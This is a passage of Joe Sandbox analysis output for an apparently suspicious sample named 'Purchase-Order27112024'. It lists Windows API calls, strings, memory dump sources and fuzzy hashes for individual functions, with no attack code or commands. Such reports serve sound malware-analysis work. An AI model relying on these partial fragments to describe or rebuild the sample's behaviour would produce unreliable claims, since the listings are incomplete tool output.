                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                      • String ID:
                                                                                                      • API String ID: 1386444988-0
                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                      • String ID: d=E
                                                                                                      • API String ID: 909852535-3703654223
                                                                                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                      • String ID: "
                                                                                                      • API String ID: 1983396471-123907689
                                                                                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                      • String ID: URL
                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                      APIs
                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2789212964-323797159
                                                                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: %%-%d.%ds
                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                      APIs
                                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                      • memset.MSVCRT ref: 00401917
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PlacementWindowmemset
                                                                                                      • String ID: WinPos
                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      • API String ID: 383090722-1948609170
                                                                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                      • API String ID: 2773794195-880857682
                                                                                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow
                                                                                                      • String ID: MZ@
                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 231171946-0
                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3669619086-0
                                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
